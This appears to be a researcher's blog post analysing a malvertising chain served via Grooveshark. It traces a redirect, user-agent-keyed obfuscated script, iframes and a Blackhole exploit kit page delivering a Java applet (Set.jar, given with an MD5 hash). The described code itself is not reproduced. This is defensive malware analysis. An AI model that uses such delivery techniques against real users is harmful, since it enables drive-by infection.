Grooveshark
A
bunch of people use Grooveshark to listen to music. While this isn't
the first time Grooveshark has served malvertisments, it's worth posting
anyways. I wasn't able to get the malicious ad syndication to bounce me
the exploit page first-hand, and the pcap data I have doesn't contain
the exploits or malware unfortunately.
Edit: I was able to get the full exploit code, but as with any exploit kit it's obfuscated to hell and back. So I have to deobfuscate it first.
The Malvertisment
If you're unfortunate enough to get served a malicious advertisment, unbeknownst to you, in the background scripts are executed that can redirect, enumerate, exploit, and infect. This malvertisment starts with a 302 redirect.
Next you'll get bounced to a body of obfuscated code that inserts a script on the page
When formatted it's easier to see what the script is doing. It's essentially using your user-agent to decode the obfuscated script.
I had to hard-code the user-agent into the script and removed some of the unnecessary HTML DOM stuff and got the iframe it creates.
Continuation...
I was able to get the malvertisment on my VM, so I have the exploit code. The next request takes you to a page with a embedded 'loading' gif and another iframe redirecting to the actual exploit code. Interestingly it also 'onbeforeunload's you to a Russian dating site. Maybe they own it and want some additional hits for monetary gain?
Here is a quick snippet of the exploit page code. It's obfuscated obviously. It's ugly. Even when formatted it's ugly.
Actually when formatted it isn't so bad. It's just a bunch of <pre> tags that hold the obfuscated code. Then as exploit kits normally do, there is a small block of javascript that deobfuscates and eval()s the whole thing. Below you can see the body of script. Also you can see an applet on the very bottom - Set.jar. I was able to retrieve that java archive. A lot of AV vendors detect it.
File: Set.jar
Size: 19713
MD5: 5F21D6629648633B42119AB73680C1D6
https://www.virustotal.com/file/8699be5447dd8ba5e530dac02310ac34fd6134d955dbf666804ec804bae3a170/analysis/
Still not done yet though...It's just blackhole but it might be one of the new versions equipped with that java 0 day. It doesn't seem that way so far...
Summary
That's all I was able to entice their server to give me. All my other attempts got HTTP 500s. I may still be able to get the exploits/malware if I get lucky and get a malvertisment in my VMs.
